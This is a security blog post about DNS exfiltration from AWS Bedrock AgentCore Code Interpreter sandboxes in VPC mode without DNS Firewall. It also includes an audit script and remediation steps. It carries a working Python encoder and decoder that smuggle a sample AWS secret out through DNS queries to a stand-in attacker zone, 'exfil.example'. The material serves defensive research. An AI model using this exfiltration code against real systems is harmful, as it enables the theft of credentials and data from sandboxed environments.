Mariusz Gębala

Posted on DEV Community • Originally published at haitmg.pl

AWS Bedrock AgentCore: VPC Mode Still Leaks DNS After Unit 42 Disclosure

On April 7, 2026, Palo Alto Networks Unit 42 published research on a DNS exfiltration vector in the AWS Bedrock AgentCore Code Interpreter. AWS had already shipped fixes during the responsible-disclosure window, which began in November 2025, including documentation updates and, from February 14, 2026, MMDSv2 defaults (the session-token variant of Firecracker's microVM metadata service, the in-sandbox counterpart of IMDSv2). By the time the post went public, SANDBOX mode had been tightened. But VPC mode without Route 53 Resolver DNS Firewall still leaks DNS (verified April 26, 2026).

Most coverage of the disclosure described two network modes. The Code Interpreter API actually offers three, selected through networkConfiguration.networkMode when the interpreter is created: PUBLIC, SANDBOX, and VPC. They behave very differently, and the difference decides whether the interpreter is safe to run on untrusted input.

I spent six hours running every relevant AgentCore network mode through the same isolation tests in eu-central-1 (Frankfurt), with real Code Interpreter sessions, real Python code, and real DNS queries. The results don't match the simplified narrative most vendor blogs are repeating.

SANDBOX has been quietly tightened. PUBLIC mode is wide open. VPC mode without DNS Firewall is the gap that survives.

The paradox that broke my assumptions: I expected VPC mode (no internet gateway, no NAT) to be the most isolated. It is not, for one specific dimension. DNS in a VPC goes to AmazonProvidedDNS, the Route 53 Resolver at the base of the VPC CIDR plus two (also reachable at 169.254.169.253), which every VPC with enableDnsSupport left at its default can reach. It is a recursive resolver, and it will resolve any public hostname for you regardless of whether the VPC has internet egress. The DNS query itself (UDP/53) is the exfiltration channel: the data is encoded into the subdomain labels of an attacker-controlled zone, and the resolver forwards the query, data included, to that zone's authoritative server. Not a single TCP connection from the sandbox has to leave the VPC.
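What that channel looks like on the wire, as an added example that is not code from the original post or from the Unit 42 research: the sandbox side turns a payload into hostnames that only need to be resolved, and the attacker side rebuilds the payload from its authoritative server's query log. The zone `exfil.example`, the session label and the sample secret are constructed for the lab; the label and name limits are the RFC 1035 ones. Nothing is transmitted when this runs; `probe()` is the only function that touches a resolver, and it is there so the before/after check from the lab can be repeated against a zone you control.

```python
# Added example: the DNS-only exfiltration channel, both ends. Not code from
# the original post or from Unit 42; zone, session and payload are constructed.
import base64
import socket

ATTACKER_ZONE = "exfil.example"   # constructed; the attacker's authoritative zone
MAX_LABEL = 63                    # RFC 1035: one label is at most 63 octets
MAX_NAME = 253                    # longest presentation-form name a resolver accepts
SAMPLE_SECRET = b"AWS_SECRET_ACCESS_KEY=" + b"x" * 378   # constructed, 400 bytes


def _chunks(text, size):
    return [text[i:i + size] for i in range(0, len(text), size)]


def build_exfil_queries(data, zone=ATTACKER_ZONE, session="s1"):
    """Sandbox side: turn `data` into hostnames. Resolving them is the leak.

    Base32 (lowercase, padding stripped) keeps every label DNS-safe and
    survives case folding. Layout: <seq>.<label>[.<label>...].<session>.<zone>
    """
    text = base64.b32encode(data).decode().rstrip("=").lower()
    suffix = f".{session}.{zone}"
    budget = MAX_NAME - len(suffix) - 5            # 4-digit sequence label plus dot
    labels_per_query = (budget + 1) // (MAX_LABEL + 1)
    per_query = labels_per_query * MAX_LABEL
    return [f"{seq:04d}." + ".".join(_chunks(piece, MAX_LABEL)) + suffix
            for seq, piece in enumerate(_chunks(text, per_query))]


def decode_exfil_queries(qnames, zone=ATTACKER_ZONE):
    """Attacker side: rebuild payloads from the authoritative server's query log.

    Tolerates retries (duplicate QNAMEs), out-of-order arrival and unrelated
    names. Returns {session: bytes}.
    """
    parts = {}
    for qname in qnames:
        name = qname.lower().rstrip(".")
        if not name.endswith("." + zone):
            continue
        labels = name[:-len(zone) - 1].split(".")
        if len(labels) < 3 or not labels[0].isdigit():
            continue
        parts.setdefault(labels[-1], {})[int(labels[0])] = "".join(labels[1:-1])
    out = {}
    for session, pieces in parts.items():
        text = "".join(pieces[k] for k in sorted(pieces))
        text += "=" * (-len(text) % 8)                  # restore base32 padding
        out[session] = base64.b32decode(text, casefold=True)
    return out


def probe(qnames):
    """Lab check: count how many names the sandbox's resolver answers.

    Give the lab zone a wildcard A record so that an answer means the query
    reached the authoritative server. Without DNS Firewall, AmazonProvidedDNS
    forwards every query (the data has left even if the answer were NXDOMAIN);
    with a BLOCK rule for "*" the resolver answers locally and forwards nothing.
    """
    resolved = 0
    for name in qnames:
        try:
            socket.gethostbyname(name)
            resolved += 1
        except socket.gaierror:
            pass
    return resolved, len(qnames)


if __name__ == "__main__":
    names = build_exfil_queries(SAMPLE_SECRET)
    print(f"{len(SAMPLE_SECRET)} bytes -> {len(names)} queries, longest {max(map(len, names))} chars")
    print(names[0])
    assert decode_exfil_queries(names)["s1"] == SAMPLE_SECRET
```

The point the encoder makes explicit: a 400-byte secret fits in four queries, each a legal hostname, and the sandbox never opens a socket to anything but the VPC resolver. The decoder needs nothing beyond the QNAMEs the authoritative server logs, which is why the channel works even when that server answers every query with NXDOMAIN.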

In the full article, I cover:

  • The three network modes empirically tested with raw JSON output for each (DNS resolution, TCP connectivity, MMDSv2, S3, STS API calls)
  • Why VPC mode leaks DNS and the AmazonProvidedDNS routing path that makes it possible
  • Same agent, same code, before and after Route 53 Resolver DNS Firewall - the fix verified end-to-end with output diffs
  • Defense matrix mapping each mode and protection to "suitable for untrusted input?"
  • 30-line audit script for finding insecure (PUBLIC mode) Code Interpreters across all four AgentCore regions
  • Lab gotchas AWS docs do not surface: self-referencing security group rule for VPC mode, the undocumented agentic_ai ENI type, asynchronous cleanup that blocks VPC teardown
  • Cost breakdown: $0.08 total for the six-hour lab in eu-central-1
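An added audit example, not the post's 30-line script: it walks a region list, lists every Code Interpreter, reads networkConfiguration.networkMode and flags the PUBLIC ones, and goes one step past the post's script by also flagging VPC-mode interpreters whose VPC has no Route 53 Resolver DNS Firewall rule group associated, which is the gap the DNS Firewall bullet above describes. Clients are injected so the logic runs here against a constructed fake account; with boto3 the factory is `lambda svc, region: boto3.client(svc, region_name=region)`. The operation and field names (bedrock-agentcore-control `list_code_interpreters` and `get_code_interpreter`, ec2 `describe_subnets`, route53resolver `list_firewall_rule_group_associations`) are as I know them from the SDKs and should be checked against the boto3 version you run; the region list is a parameter because the post does not name the four regions.

```python
# Added example: AgentCore Code Interpreter network-mode audit with a DNS
# Firewall check. Not the original post's script; see the lead-in for which
# API names are assumptions. Clients are injected so it runs offline.


def _paginate(call, key, token_key="nextToken", **kwargs):
    """Follow SDK pagination (nextToken for AgentCore, NextToken for Resolver)."""
    token = None
    while True:
        resp = call(**kwargs, **({token_key: token} if token else {}))
        yield from resp.get(key, [])
        token = resp.get(token_key)
        if not token:
            return


def vpcs_for_subnets(ec2, subnet_ids):
    """VPC mode only names subnets, so map them to VPC IDs via EC2."""
    resp = ec2.describe_subnets(SubnetIds=list(subnet_ids))
    return {s["VpcId"] for s in resp["Subnets"]}


def has_dns_firewall(r53r, vpc_id):
    """True when at least one DNS Firewall rule group is fully associated."""
    assocs = _paginate(r53r.list_firewall_rule_group_associations,
                       "FirewallRuleGroupAssociations", "NextToken", VpcId=vpc_id)
    return any(a.get("Status") == "COMPLETE" for a in assocs)


def audit(regions, client_factory):
    """Return (region, interpreter id, mode, reason) for each risky interpreter."""
    findings = []
    for region in regions:
        ctl = client_factory("bedrock-agentcore-control", region)
        for summary in _paginate(ctl.list_code_interpreters, "codeInterpreterSummaries"):
            ci_id = summary["codeInterpreterId"]
            net = ctl.get_code_interpreter(codeInterpreterId=ci_id).get("networkConfiguration", {})
            mode = net.get("networkMode")
            if mode == "PUBLIC":
                findings.append((region, ci_id, mode,
                                 "unrestricted egress; not suitable for untrusted input"))
            elif mode == "VPC":
                subnets = net.get("vpcConfig", {}).get("subnets", [])
                ec2 = client_factory("ec2", region)
                r53r = client_factory("route53resolver", region)
                for vpc in sorted(vpcs_for_subnets(ec2, subnets)):
                    if not has_dns_firewall(r53r, vpc):
                        findings.append((region, ci_id, mode,
                                         f"{vpc} has no DNS Firewall rule group; "
                                         "AmazonProvidedDNS still resolves any name"))
            # SANDBOX: no network path was open in the lab; nothing to flag.
    return findings


class FakeClient:
    """Constructed stand-in for a boto3 client: canned responses per method."""

    def __init__(self, **responses):
        self._responses = responses

    def __getattr__(self, method):
        handler = self._responses[method]
        return handler if callable(handler) else (lambda **kw: handler)


def fake_account(dns_firewall_on):
    """Constructed account: eu-central-1 has one interpreter per mode, us-east-1 none."""
    assoc = [{"Status": "COMPLETE"}] if dns_firewall_on else []
    interpreters = {
        "ci-public": {"networkMode": "PUBLIC"},
        "ci-sandbox": {"networkMode": "SANDBOX"},
        "ci-vpc": {"networkMode": "VPC",
                   "vpcConfig": {"subnets": ["subnet-lab"], "securityGroups": ["sg-lab"]}},
    }
    clients = {
        ("bedrock-agentcore-control", "eu-central-1"): FakeClient(
            list_code_interpreters={"codeInterpreterSummaries":
                                    [{"codeInterpreterId": i} for i in interpreters]},
            get_code_interpreter=lambda codeInterpreterId:
                {"networkConfiguration": interpreters[codeInterpreterId]}),
        ("ec2", "eu-central-1"): FakeClient(
            describe_subnets={"Subnets": [{"SubnetId": "subnet-lab", "VpcId": "vpc-lab"}]}),
        ("route53resolver", "eu-central-1"): FakeClient(
            list_firewall_rule_group_associations={"FirewallRuleGroupAssociations": assoc}),
        ("bedrock-agentcore-control", "us-east-1"): FakeClient(
            list_code_interpreters={"codeInterpreterSummaries": []}),
    }
    return lambda service, region: clients[(service, region)]


if __name__ == "__main__":
    # Offline demo; for a real account pass
    # lambda svc, region: boto3.client(svc, region_name=region) instead.
    for row in audit(["eu-central-1", "us-east-1"], fake_account(dns_firewall_on=False)):
        print(*row, sep="\t")
```

A VPC finding is closed by associating a DNS Firewall rule group whose rules are evaluated lowest priority number first: ALLOW rules for the domains the agent legitimately needs (the regional AWS endpoints it calls), then a final BLOCK rule for `*` with an NXDOMAIN response. Re-running the audit after the association reaches COMPLETE is the same before/after check the post's output diffs show.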

I did not stand up a malicious DNS server to verify the full exfiltration chain, but every layer the lab measured (DNS resolution plus AmazonProvidedDNS forwarding) is open. The fix is not new technology; it is a configuration AWS recommends but most tutorials skip.

Read the full article, with the lab journey, JSON evidence, Terraform setup, and defense matrix, at haitmg.pl.
